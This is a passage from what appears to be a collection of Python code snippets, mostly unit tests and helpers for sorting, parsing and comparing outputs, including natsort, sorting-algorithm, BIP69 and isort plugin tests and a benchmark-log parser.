'bubble', '-c'])\n self.assertTrue(parser.compare)\n self.assertEqual(True, parser.compare)\n\n parser = parse_args(['-g', '10', '-s', 'bubble'])\n self.assertEqual(False, parser.compare)", "def test_natsort(self):\r\n # string with alpha and numerics sort correctly\r\n s = 'sample1 sample2 sample11 sample12'.split()\r\n self.assertEqual(natsort(s),\r\n 'sample1 sample2 sample11 sample12'.split())\r\n s.reverse()\r\n self.assertEqual(natsort(s),\r\n 'sample1 sample2 sample11 sample12'.split())\r\n self.assertEqual(natsort(list('cba321')), list('123abc'))\r\n\r\n # strings with alpha only sort correctly\r\n self.assertEqual(natsort(list('cdba')), list('abcd'))\r\n\r\n # string of ints sort correctly\r\n self.assertEqual(natsort(['11', '2', '1', '0']),\r\n ['0', '1', '2', '11'])\r\n\r\n # strings of floats sort correctly\r\n self.assertEqual(natsort(['1.11', '1.12', '1.00', '0.009']),\r\n ['0.009', '1.00', '1.11', '1.12'])\r\n\r\n # string of ints sort correctly\r\n self.assertEqual(\r\n natsort([('11', 'A'), ('2', 'B'), ('1', 'C'), ('0', 'D')]),\r\n [('0', 'D'), ('1', 'C'), ('2', 'B'), ('11', 'A')])", "def test_isort_tool_plugin_scan_oserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = OSError(\"mocked error\")\n itp = setup_isort_tool_plugin()\n package = Package(\n \"valid_package\", os.path.join(os.path.dirname(__file__), \"valid_package\")\n )\n package[\"python_src\"] = [\n os.path.join(os.path.dirname(__file__), \"valid_package\", \"sample.py\")\n ]\n issues = itp.scan(package, \"level\")\n assert not issues", "def test_parse_results_valid():\n valid_result = [{\n \"url\": \"https://docs.ansible.com/ansible/.../test.html\",\n \"sections\": [\"test\"],\n \"title\": \"title – subtitle — Ansible Documentation\",\n \"body\": \"Long body containing flavor text\",\n \"_index\": \"5693d1e68db231f24d000003\",\n \"_type\": \"5693d1e68db231f24d000004\",\n \"_score\": 1,\n \"_version\": \"\",\n \"_explanation\": \"\",\n \"sort\": \"\",\n \"id\": \"test\",\n \"highlight\": {}\n }]\n assert [{\"title\": \"title\",\n \"subtitle\": \"subtitle\",\n \"arg\": \"https://docs.ansible.com/ansible/.../test.html\",\n \"valid\": True}] == parse_results(valid_result)", "def _verifyParsing(self):\n for attrname, attr in self.__dict__.items():\n if attrname.endswith('records') and iterable(attr):\n ts = get_record_timestamps(attr)\n if not issorted(ts):\n print('Sorting %s' % attrname)\n if type(attr) == list:\n attr = list(np.asarray(attr)[ts.argsort()])\n else:\n attr = attr[ts.argsort()]\n ts = get_record_timestamps(attr)\n assert issorted(ts)\n self.__dict__[attrname] = attr # update", "def test_invalid_sort():\n svl_string = \"\"\"\n DATASETS bigfoot \"bigfoot.csv\"\n LINE bigfoot X date SORT OOPS Y classification COUNT\n \"\"\"\n\n with pytest.raises(SvlSyntaxError):\n parse_svl(svl_string)", "def _is_lexsorted(self) -> bool:\n return self._lexsort_depth == self.nlevels", "def test_sort_otu_table(self):\r\n\r\n actual = sort_otu_table(parse_biom_table_str(self.otu_table1),\r\n ['NA', 'Key', 'Fing'])\r\n expected = parse_biom_table_str(self.age_sorted_otu_table1)\r\n self.assertEqual(actual, expected)", "def try_run_isort_formatting(path_to_protocol_package: str) -> None:\n subprocess.run( # nosec\n [sys.executable, \"-m\", \"isort\", *ISORT_CLI_ARGS, path_to_protocol_package],\n check=True,\n )", "def test_bogo(self):\n integers = bogo_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def step020():\n logger.logMessage('Begin: Sorting records')\n sortCommand = 'sort {0} -t \\';\\' --key 2 -o {1}'.format(candidatesFile,sortedCandidatesFile) \n rc = os.system(sortCommand)\n if rc != 0:\n raise Exception('Error returned by sort program: {0:d}'.format(rc))\n logger.logMessage('End : Sorting records')", "def test_parse_devide(self):\n self.assertEqual(parse_input.parse([\"8\", \"/\", \"4\"]), 2)", "def test_good_input():\n\n out_file = 'unclustered.fa'\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n try:\n rv, out = getstatusoutput(f'{prg} -c {cdhit} -p {proteins}')\n assert rv == 0\n assert out == ('Wrote 309 of 220,520 unclustered '\n 'proteins to \"unclustered.fa\"')\n\n assert os.path.isfile(out_file)\n\n seqs = list(SeqIO.parse(out_file, 'fasta'))\n\n assert len(seqs) == 309\n finally:\n if os.path.isfile(out_file):\n os.remove(out_file)", "def test_output(self):\n good_value_pairs = STR_VALUE_PAIRS\n for pair in good_value_pairs:\n output = to_cardinal_trio(pair[0])\n self.assertEqual(output, pair[1],\n f\"{pair[0]} should be {pair[1]}, not {output}\")", "def test_advance_ast_avaliable():\n assert _test_advanced_ast_presence()", "def check_output(output, expected_output):\n o = copy.deepcopy(output) # so that we don't mutate input\n e = copy.deepcopy(expected_output) # so that we don't mutate input\n \n o.sort()\n e.sort()\n return o == e", "def test_12(self):\n num_elements = np.random.randint(1, 11)\n\n input_array = np.random.normal(size=num_elements)\n\n # We first check the sorting implementation.\n py = sorted(input_array)\n f90 = fort_debug.wrapper_sorted(input_array, num_elements)\n assert_equal(py, f90)\n\n params_spec, options_spec = generate_random_model()\n respy_obj = RespyCls(params_spec, options_spec)\n\n edu_spec, optim_paras, num_types = dist_class_attributes(\n respy_obj, \"edu_spec\", \"optim_paras\", \"num_types\"\n )\n\n args = (edu_spec[\"start\"], edu_spec[\"share\"], edu_spec[\"max\"])\n f90 = fort_debug.wrapper_sort_edu_spec(*args)\n py = sort_edu_spec(edu_spec)\n for i, label in enumerate([\"start\", \"share\", \"max\"]):\n assert_equal(py[label], f90[i])\n\n py = sort_type_info(optim_paras, num_types)\n f90 = fort_debug.wrapper_sort_type_info(optim_paras[\"type_shares\"], num_types)\n for i, label in enumerate([\"order\", \"shares\"]):\n assert_equal(py[label], f90[i])", "def test_probabilistic_parsers():", "def test_dotted_sorting(self):\n assert natsort(['1.5', '1.0']) == ['1.0', '1.5']", "def test_quick(self):\n integers = quick_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def test_insertSort(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_1[0]),self.test_1[1])", "def test_parser(self):\n parser = hhsuite.FastaParser()\n results = parser.run(self.pipeline)\n self.assertEqual(\n results[\"templates\"][0][\"sequence_alignments\"], {\n \"sequence\": \"---A-A-----\",\n \"query\": \"XXAB-CDEFXX\"\n })\n\n self.assertEqual(\n results[\"templates\"][1][\"sequence_alignments\"], {\n \"foo\": \"---A------\",\n \"sequence\": \"--GG------\",\n \"query\": \"XXABCDEFXX\"\n })", "def test_simple_parse(self):\n pass", "def test_MinimalSamParser(self):\r\n actual = list(MinimalSamParser(self.sam_data1))\r\n expected = self.sam1_expected\r\n self.assertEqual(actual, expected)", "def test_parse_output(self):\n output_exp = [\"0.99\", \"0.01\"]\n output = parse_output(hgt_results_fp=self.consel_output_hgt_fp,\n method=\"consel\")\n self.assertEqual(output_exp, output)\n output_exp = \"1\"\n output = parse_output(hgt_results_fp=self.riatahgt_output_hgt_fp,\n method=\"riata-hgt\")\n self.assertEqual(output_exp, output)\n output_exp = (\"WP_011672248.1\\t372461\\tBuchnera aphidicola\\tProteobac\"\n \"teria;Gammaproteobacteria;Enterobacteriales;Enterobact\"\n \"eriaceae;Buchnera;Buchnera aphidicola\\t37.5\\t99.14\\nWP\"\n \"_045117937.1\\t580331\\tThermoanaerobacter italicus\\tFir\"\n \"micutes;Clostridia;Thermoanaerobacterales;Thermoanaero\"\n \"bacteraceae;Thermoanaerobacter;Thermoanaerobacter ital\"\n \"icus\\t42.6\\t93.84\")\n output = parse_output(hgt_results_fp=self.hgtector_output_hgt_fp,\n method=\"hgtector\")\n self.assertEqual(output_exp, output)\n output_exp = (\"G2311_SE001,\\tgi|557307555|ref|YP_008766893.1|\\t140749\"\n \"3\\tShigella phage SfIV\\tViruses;Caudovirales;Myovirida\"\n \"e\\t67.4\\t100\\t0.002\\nG1250_SE001,\\tgi|9630468|ref|NP_0\"\n \"46899.1|\\t40631\\tEnterobacteria phage N15\\tViruses;Cau\"\n \"dovirales;Siphoviridae;N15likevirus\\t79.4\\t100\\t0.002\\n\"\n \"G1252_SE001,\\tgi|428782382|ref|YP_007112139.1|\\t114714\"\n \"4\\tEnterobacteria phage HK225\\tViruses;Caudovirales;Si\"\n \"phoviridae;Lambdalikevirus\\t88.2\\t100\\t0.002\\nG1251_SE\"\n \"001,\\tgi|428782381|ref|YP_007112138.1|\\t1147144\\tEnter\"\n \"obacteria phage HK225\\tViruses;Caudovirales;Siphovirid\"\n \"ae;Lambdalikevirus\\t94.9\\t100\\t0.002\")\n output = parse_output(hgt_results_fp=self.darkhorse_output_hgt_fp,\n method=\"darkhorse\")\n self.assertEqual(output_exp, output)\n output_exp = \"AAA98667.1\"\n output = parse_output(hgt_results_fp=self.egid_output_hgt_fp,\n genbank_fp=self.genbank_input_fp,\n method=\"egid\")\n self.assertEqual(output_exp, output)\n output_exp = \"AAA98667.1\"\n output = parse_output(hgt_results_fp=self.genemark_output_hgt_fp,\n genbank_fp=self.genbank_input_fp,\n method=\"genemark\")\n self.assertEqual(output_exp, output)", "def test_unusual_misc():\n doc = CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n sentences = \"{:C}\".format(doc).split(\"\\n\\n\")\n assert len(sentences) == 2\n sentence = sentences[0].split(\"\\n\")\n assert len(sentence) == 14\n\n for word in sentence:\n pieces = word.split(\"\\t\")\n assert len(pieces) == 1 or len(pieces) == 10\n if len(pieces) == 10:\n assert all(piece for piece in pieces)", "def testSorting(self):\n if self.sorting in tools.SORTINGS:\n self.assertEqual(\n self.sorting,\n self.config.sorting\n )\n else:\n self.assertNotEqual(\n self.sorting,\n self.config.sorting\n )\n self.assertEqual(\n tools.SORTING_DEFAULT,\n self.config.sorting\n )", "def test_insertSort3(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_3[0]),self.test_3[1])", "def test_bug1591450(self):\n input = \"\"\"Testing <i>markup</i> and {y:i}so-forth...leading dots and trail--- well, you get-the-point. Also check numbers: 999 1,000 12:00 .45. Done?\"\"\"\n output = [\n (\"Testing\", 0), (\"i\", 9), (\"markup\", 11), (\"i\", 19), (\"and\", 22),\n (\"y\", 27), (\"i\", 29), (\"so\", 31), (\"forth\", 34), (\"leading\", 42),\n (\"dots\", 50), (\"and\", 55), (\"trail\", 59), (\"well\", 68),\n (\"you\", 74), (\"get\", 78), (\"the\", 82), (\"point\", 86),\n (\"Also\", 93), (\"check\", 98), (\"numbers\", 104), (\"Done\", 134),\n ]\n for (itmO, itmV) in zip(output, tokenize_en(input)):\n self.assertEqual(itmO, itmV)", "def test_insertion(self):\n integers = insertion_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def test_insertSort2(self):\n\t\tsortObj=insertSort()\n\t\tself.assertNotEqual(sortObj.run_sort(self.test_2[0]),self.test_2[1])", "def test_is_bip69_with_properly_sorted_inputs_and_outputs(self):\n self.assertTrue(bip69.is_bip69(self.bip69_synth))", "def test_parse(test, result, capsys):\n print(calc.parse(test))\n out, err = capsys.readouterr()\n print(err)\n assert out == result", "def test_parser(test_input, expected):\n tokens = list(sp.tokenize(test_input))\n assert tokens == expected", "def test_ip_lists_get_command_human_readable(ip_lists_success, ip_lists_success_hr):\n hr_output = prepare_ip_lists_get_output(ip_lists_success)\n assert hr_output == ip_lists_success_hr", "def issortorder(token):\n\n # Token is a sort order operator\n return token and token.lower() in Token.SORT_ORDER", "def test_analytical_vs_numerical():\n pass", "def test_make_tool_plugin_parse_valid():\n mtp = setup_make_tool_plugin()\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n output = \"valid_package/hello.c:7:3: error: expected ; before return\"\n issues = mtp.parse_output(package, output)\n assert len(issues) == 1\n assert issues[0].filename == 'valid_package/hello.c'\n assert issues[0].line_number == '7'\n assert issues[0].severity == 5\n assert issues[0].message == \"expected ; before return\"", "def test_sort_array(self):\r\n self.assertEqual(sort_array([6, 4, 9, 10]), [4, 6, 9, 10])", "def test_sanity(self):\n # First we parse the sample data.\n parse.parse_reviews()\n parsed_output = utils.open_json(\n \"processed-data/sample-mint-parsed-integrated-review.json\"\n )\n expected_parsed_output = [\n {\n \"app\": \"sample-mint\",\n \"timestamp\": \"2020/03/15 14:13:17\",\n \"message\": \"I just heard about this budgeting app. So I gave it a try. I am impressed thus far. However I still cant add all of my financial institutions so my budget is kind of skewed. But other that I can say Im more aware of my spending\",\n \"channel-type\": \"appstore\",\n \"properties\": {\n \"updated\": \"2020-03-15 14:13:17\",\n \"rating\": 5,\n \"version\": \"7.1.0\",\n \"content\": \"I just heard about this budgeting app. So I gave it a try. I am impressed thus far. However I still can\\u00e2\\u20ac\\u2122t add all of my financial institutions so my budget is kind of skewed. But other that I can say I\\u00e2\\u20ac\\u2122m more aware of my spending\",\n },\n \"hash-id\": \"bd488c4c04431bdd8fb7ddb5dcf84d7a8b0479e2\",\n }\n ]\n self.assertEqual(parsed_output, expected_parsed_output)\n\n # We run the algorithms on that data\n algo.run_algo()\n processed_output = utils.open_json(\n \"processed-data/sample-mint-processed-integrated-review.json\"\n )\n expected_processed_output = [\n {\n \"app\": \"sample-mint\",\n \"timestamp\": \"2020/03/15 14:13:17\",\n \"message\": \"I just heard about this budgeting app. So I gave it a try. I am impressed thus far. However I still cant add all of my financial institutions so my budget is kind of skewed. But other that I can say Im more aware of my spending\",\n \"channel-type\": \"appstore\",\n \"properties\": {\n \"updated\": \"2020-03-15 14:13:17\",\n \"rating\": 5,\n \"version\": \"7.1.0\",\n \"content\": \"I just heard about this budgeting app. So I gave it a try. I am impressed thus far. However I still can\\u00e2\\u20ac\\u2122t add all of my financial institutions so my budget is kind of skewed. But other that I can say I\\u00e2\\u20ac\\u2122m more aware of my spending\",\n },\n \"hash-id\": \"bd488c4c04431bdd8fb7ddb5dcf84d7a8b0479e2\",\n \"derived-insight\": {\n \"sentiment\": {\n \"neg\": 0.0,\n \"neu\": 0.928,\n \"pos\": 0.072,\n \"compound\": 0.4767,\n },\n \"extra-properties\": {\n \"category-scores\": {\n \"User Experience\": 0,\n \"sign-in/sign-up\": 0,\n \"Notification\": 0,\n \"Application\": 1,\n \"ads\": 0,\n },\n \"bug-feature\": \"feature\",\n },\n \"category\": \"Application\",\n },\n }\n ]\n self.assertEqual(processed_output, expected_processed_output)", "def main(iterator):\n\n entries = OrderedDict()\n for line in iterator:\n\n if \"START\" in line:\n entries.update({\"start_time\":int(re.search(r'\\d+', line).group())})\n if \"STOP\" in line:\n entries.update({\"end_time\":int(re.search(r'\\d+', line).group())})\n if \"NUMERIC SORT\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"numeric_sort\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n entries.update({\"numeric_sort_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"numeric_sort_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"numeric_sort_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"numeric_sort_num_arrs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"numeric_sort_arr_size\":int(re.search(r'\\d+', line).group())})\n\n if \"STRING SORT\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"string_sort\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_num_arrs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_arr_size\":int(re.search(r'\\d+', line).group())})\n\n if \"STRING SORT\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"string_sort\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_num_arrs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_arr_size\":int(re.search(r'\\d+', line).group())})\n\n if \"BITFIELD\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"bitfield\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"bitfield_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"bitfield_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"bitfield_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"bitfield_ops_arr_size\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"bitfield_arr_size\":int(re.search(r'\\d+', line).group())})\n\n if \"FP EMULATION\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"fp_emul\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fp_emul_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fp_emul_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fp_emul_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"fp_emul_num_loops\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"fp_emul_arr_size\":int(re.search(r'\\d+', line).group())})\n\n if \"FOURIER\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"fourier\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fourier_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fourier_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fourier_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"fourier_num_coef\":int(re.search(r'\\d+', line).group())})\n\n if \"ASSIGNMENT\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"assignment\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n entries.update({\"assignment_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"assignment_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"assignment_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"assignment_num_arrs\":int(re.search(r'\\d+', line).group())})\n\n if \"IDEA\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"idea\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"idea_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"idea_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"idea_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"idea_arr_size\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"idea_num_loops\":int(re.search(r'\\d+', line).group())})\n \n if \"HUFFMAN\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"huffman\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"huffman_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"huffman_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"huffman_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"huffman_arr_size\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"huffman_num_loops\":int(re.search(r'\\d+', line).group())})\n\n\n if \"NEURAL NET\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"nnet\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"nnet_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"nnet_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"nnet_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"nnet_num_loops\":int(re.search(r'\\d+', line).group())})\n\n if \"LU DECOMPOSITION\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"lu_decomp\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"lu_decomp_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"lu_decomp_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"lu_decomp_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"lu_decomp_num_arrs\":int(re.search(r'\\d+', line).group())})\n\n if \"libc\" in line and \"Baseline\" not in line and \"*\" not in line:\n line = next(iterator)\n \n entries.update({\"memory_index\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"integer_index\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"float_index\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n\n #print(entries)\n return entries", "def test_basic_parser_trace():", "def test_bad_date():\n assert sort_memos(bad_record) == 'Error'", "def test_traffic_analysis_human_readable(\n traffic_analysis_success, traffic_analysis_success_hr\n):\n resp = prepare_traffic_analysis_output(traffic_analysis_success)\n assert resp == traffic_analysis_success_hr", "def _compare_output(standart_output, testing_output):\n standart_output_array = standart_output.splitlines()\n testing_output_array = testing_output.splitlines()\n standart_output_array_len = len(standart_output_array)\n testing_output_array_len = len(testing_output_array)\n\n if standart_output_array_len != testing_output_array_len:\n print 'there is different count of steps standart: ', standart_output_array_len, \\\n ' testing: ', testing_output_array_len\n return False\n\n for index in range(0, len(standart_output_array), 1):\n if standart_output_array[index] != testing_output_array[index]:\n print 'there is different results in same step for standsret: ', standart_output_array[index], \\\n ' and testing: ', testing_output_array[index]\n return False\n\n return True", "def test_get_sort_info(self):\n ars = self.ar[2009][11]['day']\n self.assertEqual(ars.get_sort_info(), (31, 'key', True))", "def test_invalid_args(self):\n self.assertEqual(dictsort([{}], \"._private\"), \"\")\n self.assertEqual(dictsort([{\"_private\": \"test\"}], \"_private\"), \"\")\n self.assertEqual(\n dictsort([{\"nested\": {\"_private\": \"test\"}}], \"nested._private\"), \"\"\n )", "def test_sort_outputs_0a6a357e(self):\n outputs = bip69.get_outputs_from_rpc_json(self.tx_json_0a6a357e)\n bip69_outputs = bip69.sort_outputs(outputs)\n self.assertEqual(bip69_outputs[0], (('76a9144a5fba237213a062f6f57978f79'\n '6390bdcf8d01588ac'), 400057456))\n self.assertEqual(bip69_outputs[1], (('76a9145be32612930b8323add2212a4ec'\n '03c1562084f8488ac'), 40000000000))", "def check_sort(self):\n if self.list == []:\n return True\n seg_iter = iter(self.list)\n last = next(seg_iter)\n for segment in seg_iter:\n if last > segment:\n raise Exception('non trié')\n last = segment\n return True", "def pass_test(sort_func, arr):\n sort_array = sorted(arr[:])\n # Print accordingly\n if sort_func(arr[:]) == sort_array:\n print(\"Test Passed\")\n else:\n print(\"Error: Test not passed\")", "def check_input_matches_expected_output(in_, out):\n ...", "def test_merge(self):\n integers = merge_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def test_rust_code_analysis_tokei_c() -> None:\n\n ret_value = compare(\n \"rust-code-analysis\",\n \"tokei\",\n [\"-g\", \"-f\"],\n [\"SLOC\", \"PLOC\", \"CLOC\", \"BLANK\"],\n \"C\",\n \"bubble_sort.c\",\n )\n\n assert ret_value == 0", "def test_isort_tool_plugin_scan_calledprocesserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = subprocess.CalledProcessError(\n 0, \"\", output=\"mocked error\"\n )\n itp = setup_isort_tool_plugin()\n package = Package(\n \"valid_package\", os.path.join(os.path.dirname(__file__), \"valid_package\")\n )\n package[\"python_src\"] = [\n os.path.join(os.path.dirname(__file__), \"valid_package\", \"sample.py\")\n ]\n issues = itp.scan(package, \"level\")\n assert len(issues) == 1", "def test__parse_archived():\n for input_data, expected_output in (\n ({}, False),\n ({'thread_metadata': {}}, False),\n ({'thread_metadata': {'archived': False}}, False),\n ({'thread_metadata': {'archived': True}}, True),\n ):\n output = parse_archived(input_data)\n vampytest.assert_eq(output, expected_output)", "def test_output(self):\n good_value_pairs = INT_VALUE_PAIRS\n for pair in good_value_pairs:\n output = to_cardinal_number(pair[0])\n self.assertEqual(output, pair[1],\n f\"{pair[0]} should be {pair[1]}, not {output}\")", "def test_parse_sort(self):\n old_type = Sort('sort', [\n Relationship('student', PersonSchema(), None),\n Relationship('school', StudentSchema(), None)],\n Attribute('title', SchoolSchema(), None), '+')\n new_type = self.driver.parse(old_type)\n\n assert new_type.source == old_type\n assert old_type.relationships != new_type.relationships\n assert isinstance(new_type.relationships[0], Mapper)\n assert old_type.attribute != new_type.attribute\n assert isinstance(new_type.attribute, Column)\n assert old_type.direction == new_type.direction", "def test_make_tool_plugin_parse_invalid():\n mtp = setup_make_tool_plugin()\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n output = \"invalid text\"\n issues = mtp.parse_output(package, output)\n assert not issues", "def test_sort_inputs_0a6a357e(self):\n inputs = bip69.get_inputs_from_rpc_json(self.tx_json_0a6a357e)\n bip69_inputs = bip69.sort_inputs(inputs)\n self.assertEqual(bip69_inputs[0],\n (('0e53ec5dfb2cb8a71fec32dc9a634a35b7e24799295ddd52782'\n '17822e0b31f57'), 0))\n self.assertEqual(bip69_inputs[10],\n (('7d037ceb2ee0dc03e82f17be7935d238b35d1deabf953a892a4'\n '507bfbeeb3ba4'), 1))", "def check_correctness(self):\n\n with open(self.output_file, 'r') as output_file, open(self.gt_file, 'r') as gt_file:\n\n out_lines = output_file.readlines()\n gt_lines = gt_file.readlines()\n\n # Check for inequality\n if len(out_lines) != len(gt_lines):\n return 0\n\n # Check for inequality\n for i in range(len(out_lines)):\n out_split = 